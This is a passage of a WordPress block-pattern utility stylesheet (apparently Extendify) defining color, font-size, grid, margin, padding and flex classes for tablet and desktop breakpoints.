/* no suggestion */ background-color: var(--wp--preset--color--background, #fff) !important; } .has-primary-color { /* no suggestion */ color: var(--wp--preset--color--primary, #4b5563) !important; } .has-primary-background-color { /* no suggestion */ background-color: var(--wp--preset--color--primary, #4b5563) !important; } .has-secondary-color { /* no suggestion */ color: var(--wp--preset--color--secondary, #9ca3af) !important; } .has-secondary-background-color { /* no suggestion */ background-color: var(--wp--preset--color--secondary, #9ca3af) !important; } /* Ensure themes that target specific elements use the right colors */ .ext.has-text-color p, .ext.has-text-color h1, .ext.has-text-color h2, .ext.has-text-color h3, .ext.has-text-color h4, .ext.has-text-color h5, .ext.has-text-color h6 { /* no suggestion */ color: currentColor !important; } .has-white-color { /* no suggestion */ color: var(--wp--preset--color--white, #fff) !important; } .has-black-color { /* no suggestion */ color: var(--wp--preset--color--black, #000) !important; } .has-ext-foreground-background-color { /* no suggestion */ background-color: var( --wp--preset--color--foreground, var(--wp--preset--color--black, #000) ) !important; } .has-ext-primary-background-color { /* no suggestion */ background-color: var( --wp--preset--color--primary, var(--wp--preset--color--cyan-bluish-gray, #000) ) !important; } /* Fix button borders with specified background colors */ .wp-block-button__link.has-black-background-color { /* no suggestion */ border-color: var(--wp--preset--color--black, #000) !important; } .wp-block-button__link.has-white-background-color { /* no suggestion */ border-color: var(--wp--preset--color--white, #fff) !important; } .has-ext-small-font-size { /* no suggestion */ font-size: var(--wp--preset--font-size--ext-small) !important; } .has-ext-medium-font-size { /* no suggestion */ font-size: var(--wp--preset--font-size--ext-medium) !important; } .has-ext-large-font-size { /* no suggestion */ font-size: var(--wp--preset--font-size--ext-large) !important; line-height: 1.2 !important; } .has-ext-x-large-font-size { /* no suggestion */ font-size: var(--wp--preset--font-size--ext-x-large) !important; line-height: 1 !important; } .has-ext-xx-large-font-size { /* no suggestion */ font-size: var(--wp--preset--font-size--ext-xx-large) !important; line-height: 1 !important; } /* Line height */ .has-ext-x-large-font-size:not([style*="line-height"]) { /* no suggestion */ line-height: 1.1 !important; } .has-ext-xx-large-font-size:not([style*="line-height"]) { /* no suggestion */ line-height: 1.1 !important; } .ext .wp-block-group > * { /* Line height */ margin-top: 0 !important; margin-bottom: 0 !important; } .ext .wp-block-group > * + * { margin-top: var(--wp--style--block-gap, 1.75rem) !important; margin-bottom: 0 !important; } .ext h2 { margin-top: var(--wp--style--block-gap, 1.75rem) !important; margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .has-ext-x-large-font-size + p, .has-ext-x-large-font-size + h3 { margin-top: 0.5rem !important; } .ext .wp-block-buttons > .wp-block-button.wp-block-button__width-25 { width: calc(25% - var(--wp--style--block-gap, 0.5em) * 0.75) !important; min-width: 12rem !important; } /* Classic themes use an inner [class*="_inner-container"] that our utilities cannot directly target, so we need to do so with a few */ .ext .ext-grid > [class*="_inner-container"] { /* no suggestion */ display: grid !important; } /* Unhinge grid for container blocks in classic themes, and < 5.9 */ .ext > [class*="_inner-container"] > .ext-grid:not([class*="columns"]), .ext > [class*="_inner-container"] > .wp-block > .ext-grid:not([class*="columns"]) { /* no suggestion */ display: initial !important; } /* Grid Columns */ .ext .ext-grid-cols-1 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(1, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-2 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(2, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-3 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(3, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-4 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(4, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-5 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(5, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-6 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(6, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-7 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(7, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-8 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(8, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-9 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(9, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-10 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(10, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-11 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(11, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-12 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(12, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-13 > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: repeat(13, minmax(0, 1fr)) !important; } .ext .ext-grid-cols-none > [class*="_inner-container"] { /* no suggestion */ grid-template-columns: none !important; } /* Grid Rows */ .ext .ext-grid-rows-1 > [class*="_inner-container"] { /* no suggestion */ grid-template-rows: repeat(1, minmax(0, 1fr)) !important; } .ext .ext-grid-rows-2 > [class*="_inner-container"] { /* no suggestion */ grid-template-rows: repeat(2, minmax(0, 1fr)) !important; } .ext .ext-grid-rows-3 > [class*="_inner-container"] { /* no suggestion */ grid-template-rows: repeat(3, minmax(0, 1fr)) !important; } .ext .ext-grid-rows-4 > [class*="_inner-container"] { /* no suggestion */ grid-template-rows: repeat(4, minmax(0, 1fr)) !important; } .ext .ext-grid-rows-5 > [class*="_inner-container"] { /* no suggestion */ grid-template-rows: repeat(5, minmax(0, 1fr)) !important; } .ext .ext-grid-rows-6 > [class*="_inner-container"] { /* no suggestion */ grid-template-rows: repeat(6, minmax(0, 1fr)) !important; } .ext .ext-grid-rows-none > [class*="_inner-container"] { /* no suggestion */ grid-template-rows: none !important; } /* Align */ .ext .ext-items-start > [class*="_inner-container"] { align-items: flex-start !important; } .ext .ext-items-end > [class*="_inner-container"] { align-items: flex-end !important; } .ext .ext-items-center > [class*="_inner-container"] { align-items: center !important; } .ext .ext-items-baseline > [class*="_inner-container"] { align-items: baseline !important; } .ext .ext-items-stretch > [class*="_inner-container"] { align-items: stretch !important; } .ext.wp-block-group > *:last-child { /* no suggestion */ margin-bottom: 0 !important; } /* For <5.9 */ .ext .wp-block-group__inner-container { /* no suggestion */ padding: 0 !important; } .ext.has-background { /* no suggestion */ padding-left: var(--wp--style--block-gap, 1.75rem) !important; padding-right: var(--wp--style--block-gap, 1.75rem) !important; } /* Fallback for classic theme group blocks */ .ext *[class*="inner-container"] > .alignwide *[class*="inner-container"], .ext *[class*="inner-container"] > [data-align="wide"] *[class*="inner-container"] { /* no suggestion */ max-width: var(--responsive--alignwide-width, 120rem) !important; } .ext *[class*="inner-container"] > .alignwide *[class*="inner-container"] > *, .ext *[class*="inner-container"] > [data-align="wide"] *[class*="inner-container"] > * { /* no suggestion */ } .ext *[class*="inner-container"] > .alignwide *[class*="inner-container"] > *, .ext *[class*="inner-container"] > [data-align="wide"] *[class*="inner-container"] > * { max-width: 100% !important; } /* Ensure image block display is standardized */ .ext .wp-block-image { /* no suggestion */ position: relative !important; text-align: center !important; } .ext .wp-block-image img { /* no suggestion */ display: inline-block !important; vertical-align: middle !important; } body { /* no suggestion */ /* We need to abstract this out of tailwind.config because clamp doesnt translate with negative margins */ --extendify--spacing--large: var( --wp--custom--spacing--large, clamp(2em, 8vw, 8em) ) !important; /* Add pattern preset font sizes */ --wp--preset--font-size--ext-small: 1rem !important; --wp--preset--font-size--ext-medium: 1.125rem !important; --wp--preset--font-size--ext-large: clamp(1.65rem, 3.5vw, 2.15rem) !important; --wp--preset--font-size--ext-x-large: clamp(3rem, 6vw, 4.75rem) !important; --wp--preset--font-size--ext-xx-large: clamp(3.25rem, 7.5vw, 5.75rem) !important; /* Fallbacks for pre 5.9 themes */ --wp--preset--color--black: #000 !important; --wp--preset--color--white: #fff !important; } .ext * { box-sizing: border-box !important; } /* Astra: Remove spacer block visuals in the library */ .block-editor-block-preview__content-iframe .ext [data-type="core/spacer"] .components-resizable-box__container { /* no suggestion */ background: transparent !important; } .block-editor-block-preview__content-iframe .ext [data-type="core/spacer"] .block-library-spacer__resize-container::before { /* no suggestion */ display: none !important; } /* Twenty Twenty adds a lot of margin automatically to blocks. We only want our own margin added to our patterns. */ .ext .wp-block-group__inner-container figure.wp-block-gallery.alignfull { /* no suggestion */ margin-top: unset !important; margin-bottom: unset !important; } /* Ensure no funky business is assigned to alignwide */ .ext .alignwide { /* no suggestion */ margin-left: auto !important; margin-right: auto !important; } /* Negate blockGap being inappropriately assigned in the editor */ .is-root-container.block-editor-block-list__layout > [data-align="full"]:not(:first-of-type) > .ext-my-0, .is-root-container.block-editor-block-list__layout > [data-align="wide"] > .ext-my-0:not([style*="margin"]) { /* no suggestion */ margin-top: calc(-1 * var(--wp--style--block-gap, 28px)) !important; } /* Ensure vh content in previews looks taller */ .block-editor-block-preview__content-iframe .preview\:min-h-50 { /* no suggestion */ min-height: 50vw !important; } .block-editor-block-preview__content-iframe .preview\:min-h-60 { /* no suggestion */ min-height: 60vw !important; } .block-editor-block-preview__content-iframe .preview\:min-h-70 { /* no suggestion */ min-height: 70vw !important; } .block-editor-block-preview__content-iframe .preview\:min-h-80 { /* no suggestion */ min-height: 80vw !important; } .block-editor-block-preview__content-iframe .preview\:min-h-100 { /* no suggestion */ min-height: 100vw !important; } /* Removes excess margin when applied to the alignfull parent div in Block Themes */ .ext-mr-0.alignfull:not([style*="margin"]):not([style*="margin"]) { /* no suggestion */ margin-right: 0 !important; } .ext-ml-0:not([style*="margin"]):not([style*="margin"]) { /* no suggestion */ margin-left: 0 !important; } /* Ensures fullwidth blocks display properly in the editor when margin is zeroed out */ .is-root-container .wp-block[data-align="full"] > .ext-mx-0:not([style*="margin"]):not([style*="margin"]) { /* no suggestion */ margin-right: calc(1 * var(--wp--custom--spacing--outer, 0)) !important; margin-left: calc(1 * var(--wp--custom--spacing--outer, 0)) !important; overflow: hidden !important; width: unset !important; } @media (min-width: 782px) { .tablet\:ext-absolute { position: absolute !important; } .tablet\:ext-relative { position: relative !important; } .tablet\:ext-top-base { top: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-top-lg { top: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--top-base { top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--top-lg { top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-right-base { right: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-right-lg { right: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--right-base { right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--right-lg { right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-bottom-base { bottom: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-bottom-lg { bottom: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--bottom-base { bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--bottom-lg { bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-left-base { left: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-left-lg { left: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--left-base { left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--left-lg { left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-order-1 { order: 1 !important; } .tablet\:ext-order-2 { order: 2 !important; } .tablet\:ext-m-0:not([style*="margin"]) { margin: 0 !important; } .tablet\:ext-m-auto:not([style*="margin"]) { margin: auto !important; } .tablet\:ext-m-base:not([style*="margin"]) { margin: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-m-lg:not([style*="margin"]) { margin: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--m-base:not([style*="margin"]) { margin: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--m-lg:not([style*="margin"]) { margin: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-mx-0:not([style*="margin"]) { margin-left: 0 !important; margin-right: 0 !important; } .tablet\:ext-mx-auto:not([style*="margin"]) { margin-left: auto !important; margin-right: auto !important; } .tablet\:ext-mx-base:not([style*="margin"]) { margin-left: var(--wp--style--block-gap, 1.75rem) !important; margin-right: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-mx-lg:not([style*="margin"]) { margin-left: var(--extendify--spacing--large, 3rem) !important; margin-right: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--mx-base:not([style*="margin"]) { margin-left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; margin-right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--mx-lg:not([style*="margin"]) { margin-left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; margin-right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-my-0:not([style*="margin"]) { margin-top: 0 !important; margin-bottom: 0 !important; } .tablet\:ext-my-auto:not([style*="margin"]) { margin-top: auto !important; margin-bottom: auto !important; } .tablet\:ext-my-base:not([style*="margin"]) { margin-top: var(--wp--style--block-gap, 1.75rem) !important; margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-my-lg:not([style*="margin"]) { margin-top: var(--extendify--spacing--large, 3rem) !important; margin-bottom: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--my-base:not([style*="margin"]) { margin-top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; margin-bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--my-lg:not([style*="margin"]) { margin-top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; margin-bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-mt-0:not([style*="margin"]) { margin-top: 0 !important; } .tablet\:ext-mt-auto:not([style*="margin"]) { margin-top: auto !important; } .tablet\:ext-mt-base:not([style*="margin"]) { margin-top: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-mt-lg:not([style*="margin"]) { margin-top: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--mt-base:not([style*="margin"]) { margin-top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--mt-lg:not([style*="margin"]) { margin-top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-mr-0:not([style*="margin"]) { margin-right: 0 !important; } .tablet\:ext-mr-auto:not([style*="margin"]) { margin-right: auto !important; } .tablet\:ext-mr-base:not([style*="margin"]) { margin-right: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-mr-lg:not([style*="margin"]) { margin-right: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--mr-base:not([style*="margin"]) { margin-right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--mr-lg:not([style*="margin"]) { margin-right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-mb-0:not([style*="margin"]) { margin-bottom: 0 !important; } .tablet\:ext-mb-auto:not([style*="margin"]) { margin-bottom: auto !important; } .tablet\:ext-mb-base:not([style*="margin"]) { margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-mb-lg:not([style*="margin"]) { margin-bottom: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--mb-base:not([style*="margin"]) { margin-bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--mb-lg:not([style*="margin"]) { margin-bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-ml-0:not([style*="margin"]) { margin-left: 0 !important; } .tablet\:ext-ml-auto:not([style*="margin"]) { margin-left: auto !important; } .tablet\:ext-ml-base:not([style*="margin"]) { margin-left: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-ml-lg:not([style*="margin"]) { margin-left: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext--ml-base:not([style*="margin"]) { margin-left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .tablet\:ext--ml-lg:not([style*="margin"]) { margin-left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .tablet\:ext-block { display: block !important; } .tablet\:ext-inline-block { display: inline-block !important; } .tablet\:ext-inline { display: inline !important; } .tablet\:ext-flex { display: flex !important; } .tablet\:ext-inline-flex { display: inline-flex !important; } .tablet\:ext-grid { display: grid !important; } .tablet\:ext-inline-grid { display: inline-grid !important; } .tablet\:ext-hidden { display: none !important; } .tablet\:ext-w-auto { width: auto !important; } .tablet\:ext-w-full { width: 100% !important; } .tablet\:ext-max-w-full { max-width: 100% !important; } .tablet\:ext-flex-1 { flex: 1 1 0% !important; } .tablet\:ext-flex-auto { flex: 1 1 auto !important; } .tablet\:ext-flex-initial { flex: 0 1 auto !important; } .tablet\:ext-flex-none { flex: none !important; } .tablet\:ext-flex-shrink-0 { flex-shrink: 0 !important; } .tablet\:ext-flex-shrink { flex-shrink: 1 !important; } .tablet\:ext-flex-grow-0 { flex-grow: 0 !important; } .tablet\:ext-flex-grow { flex-grow: 1 !important; } .tablet\:ext-list-none { list-style-type: none !important; } .tablet\:ext-grid-cols-1 { grid-template-columns: repeat(1, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-2 { grid-template-columns: repeat(2, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-3 { grid-template-columns: repeat(3, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-4 { grid-template-columns: repeat(4, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-5 { grid-template-columns: repeat(5, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-6 { grid-template-columns: repeat(6, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-7 { grid-template-columns: repeat(7, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-8 { grid-template-columns: repeat(8, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-9 { grid-template-columns: repeat(9, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-10 { grid-template-columns: repeat(10, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-11 { grid-template-columns: repeat(11, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-12 { grid-template-columns: repeat(12, minmax(0, 1fr)) !important; } .tablet\:ext-grid-cols-none { grid-template-columns: none !important; } .tablet\:ext-flex-row { flex-direction: row !important; } .tablet\:ext-flex-row-reverse { flex-direction: row-reverse !important; } .tablet\:ext-flex-col { flex-direction: column !important; } .tablet\:ext-flex-col-reverse { flex-direction: column-reverse !important; } .tablet\:ext-flex-wrap { flex-wrap: wrap !important; } .tablet\:ext-flex-wrap-reverse { flex-wrap: wrap-reverse !important; } .tablet\:ext-flex-nowrap { flex-wrap: nowrap !important; } .tablet\:ext-items-start { align-items: flex-start !important; } .tablet\:ext-items-end { align-items: flex-end !important; } .tablet\:ext-items-center { align-items: center !important; } .tablet\:ext-items-baseline { align-items: baseline !important; } .tablet\:ext-items-stretch { align-items: stretch !important; } .tablet\:ext-justify-start { justify-content: flex-start !important; } .tablet\:ext-justify-end { justify-content: flex-end !important; } .tablet\:ext-justify-center { justify-content: center !important; } .tablet\:ext-justify-between { justify-content: space-between !important; } .tablet\:ext-justify-around { justify-content: space-around !important; } .tablet\:ext-justify-evenly { justify-content: space-evenly !important; } .tablet\:ext-justify-items-start { justify-items: start !important; } .tablet\:ext-justify-items-end { justify-items: end !important; } .tablet\:ext-justify-items-center { justify-items: center !important; } .tablet\:ext-justify-items-stretch { justify-items: stretch !important; } .tablet\:ext-justify-self-auto { justify-self: auto !important; } .tablet\:ext-justify-self-start { justify-self: start !important; } .tablet\:ext-justify-self-end { justify-self: end !important; } .tablet\:ext-justify-self-center { justify-self: center !important; } .tablet\:ext-justify-self-stretch { justify-self: stretch !important; } .tablet\:ext-p-0:not([style*="padding"]) { padding: 0 !important; } .tablet\:ext-p-base:not([style*="padding"]) { padding: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-p-lg:not([style*="padding"]) { padding: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext-px-0:not([style*="padding"]) { padding-left: 0 !important; padding-right: 0 !important; } .tablet\:ext-px-base:not([style*="padding"]) { padding-left: var(--wp--style--block-gap, 1.75rem) !important; padding-right: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-px-lg:not([style*="padding"]) { padding-left: var(--extendify--spacing--large, 3rem) !important; padding-right: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext-py-0:not([style*="padding"]) { padding-top: 0 !important; padding-bottom: 0 !important; } .tablet\:ext-py-base:not([style*="padding"]) { padding-top: var(--wp--style--block-gap, 1.75rem) !important; padding-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-py-lg:not([style*="padding"]) { padding-top: var(--extendify--spacing--large, 3rem) !important; padding-bottom: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext-pt-0:not([style*="padding"]) { padding-top: 0 !important; } .tablet\:ext-pt-base:not([style*="padding"]) { padding-top: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-pt-lg:not([style*="padding"]) { padding-top: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext-pr-0:not([style*="padding"]) { padding-right: 0 !important; } .tablet\:ext-pr-base:not([style*="padding"]) { padding-right: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-pr-lg:not([style*="padding"]) { padding-right: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext-pb-0:not([style*="padding"]) { padding-bottom: 0 !important; } .tablet\:ext-pb-base:not([style*="padding"]) { padding-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-pb-lg:not([style*="padding"]) { padding-bottom: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext-pl-0:not([style*="padding"]) { padding-left: 0 !important; } .tablet\:ext-pl-base:not([style*="padding"]) { padding-left: var(--wp--style--block-gap, 1.75rem) !important; } .tablet\:ext-pl-lg:not([style*="padding"]) { padding-left: var(--extendify--spacing--large, 3rem) !important; } .tablet\:ext-text-left { text-align: left !important; } .tablet\:ext-text-center { text-align: center !important; } .tablet\:ext-text-right { text-align: right !important; } } @media (min-width: 1080px) { .desktop\:ext-absolute { position: absolute !important; } .desktop\:ext-relative { position: relative !important; } .desktop\:ext-top-base { top: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-top-lg { top: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--top-base { top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--top-lg { top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-right-base { right: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-right-lg { right: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--right-base { right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--right-lg { right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-bottom-base { bottom: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-bottom-lg { bottom: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--bottom-base { bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--bottom-lg { bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-left-base { left: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-left-lg { left: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--left-base { left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--left-lg { left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-order-1 { order: 1 !important; } .desktop\:ext-order-2 { order: 2 !important; } .desktop\:ext-m-0:not([style*="margin"]) { margin: 0 !important; } .desktop\:ext-m-auto:not([style*="margin"]) { margin: auto !important; } .desktop\:ext-m-base:not([style*="margin"]) { margin: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-m-lg:not([style*="margin"]) { margin: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--m-base:not([style*="margin"]) { margin: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--m-lg:not([style*="margin"]) { margin: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-mx-0:not([style*="margin"]) { margin-left: 0 !important; margin-right: 0 !important; } .desktop\:ext-mx-auto:not([style*="margin"]) { margin-left: auto !important; margin-right: auto !important; } .desktop\:ext-mx-base:not([style*="margin"]) { margin-left: var(--wp--style--block-gap, 1.75rem) !important; margin-right: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-mx-lg:not([style*="margin"]) { margin-left: var(--extendify--spacing--large, 3rem) !important; margin-right: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--mx-base:not([style*="margin"]) { margin-left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; margin-right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--mx-lg:not([style*="margin"]) { margin-left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; margin-right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-my-0:not([style*="margin"]) { margin-top: 0 !important; margin-bottom: 0 !important; } .desktop\:ext-my-auto:not([style*="margin"]) { margin-top: auto !important; margin-bottom: auto !important; } .desktop\:ext-my-base:not([style*="margin"]) { margin-top: var(--wp--style--block-gap, 1.75rem) !important; margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-my-lg:not([style*="margin"]) { margin-top: var(--extendify--spacing--large, 3rem) !important; margin-bottom: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--my-base:not([style*="margin"]) { margin-top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; margin-bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--my-lg:not([style*="margin"]) { margin-top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; margin-bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-mt-0:not([style*="margin"]) { margin-top: 0 !important; } .desktop\:ext-mt-auto:not([style*="margin"]) { margin-top: auto !important; } .desktop\:ext-mt-base:not([style*="margin"]) { margin-top: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-mt-lg:not([style*="margin"]) { margin-top: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--mt-base:not([style*="margin"]) { margin-top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--mt-lg:not([style*="margin"]) { margin-top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-mr-0:not([style*="margin"]) { margin-right: 0 !important; } .desktop\:ext-mr-auto:not([style*="margin"]) { margin-right: auto !important; } .desktop\:ext-mr-base:not([style*="margin"]) { margin-right: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-mr-lg:not([style*="margin"]) { margin-right: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--mr-base:not([style*="margin"]) { margin-right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--mr-lg:not([style*="margin"]) { margin-right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-mb-0:not([style*="margin"]) { margin-bottom: 0 !important; } .desktop\:ext-mb-auto:not([style*="margin"]) { margin-bottom: auto !important; } .desktop\:ext-mb-base:not([style*="margin"]) { margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-mb-lg:not([style*="margin"]) { margin-bottom: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--mb-base:not([style*="margin"]) { margin-bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--mb-lg:not([style*="margin"]) { margin-bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-ml-0:not([style*="margin"]) { margin-left: 0 !important; } .desktop\:ext-ml-auto:not([style*="margin"]) { margin-left: auto !important; } .desktop\:ext-ml-base:not([style*="margin"]) { margin-left: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-ml-lg:not([style*="margin"]) { margin-left: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext--ml-base:not([style*="margin"]) { margin-left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .desktop\:ext--ml-lg:not([style*="margin"]) { margin-left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .desktop\:ext-block { display: block !important; } .desktop\:ext-inline-block { display: inline-block !important; } .desktop\:ext-inline { display: inline !important; } .desktop\:ext-flex { display: flex !important; } .desktop\:ext-inline-flex { display: inline-flex !important; } .desktop\:ext-grid { display: grid !important; } .desktop\:ext-inline-grid { display: inline-grid !important; } .desktop\:ext-hidden { display: none !important; } .desktop\:ext-w-auto { width: auto !important; } .desktop\:ext-w-full { width: 100% !important; } .desktop\:ext-max-w-full { max-width: 100% !important; } .desktop\:ext-flex-1 { flex: 1 1 0% !important; } .desktop\:ext-flex-auto { flex: 1 1 auto !important; } .desktop\:ext-flex-initial { flex: 0 1 auto !important; } .desktop\:ext-flex-none { flex: none !important; } .desktop\:ext-flex-shrink-0 { flex-shrink: 0 !important; } .desktop\:ext-flex-shrink { flex-shrink: 1 !important; } .desktop\:ext-flex-grow-0 { flex-grow: 0 !important; } .desktop\:ext-flex-grow { flex-grow: 1 !important; } .desktop\:ext-list-none { list-style-type: none !important; 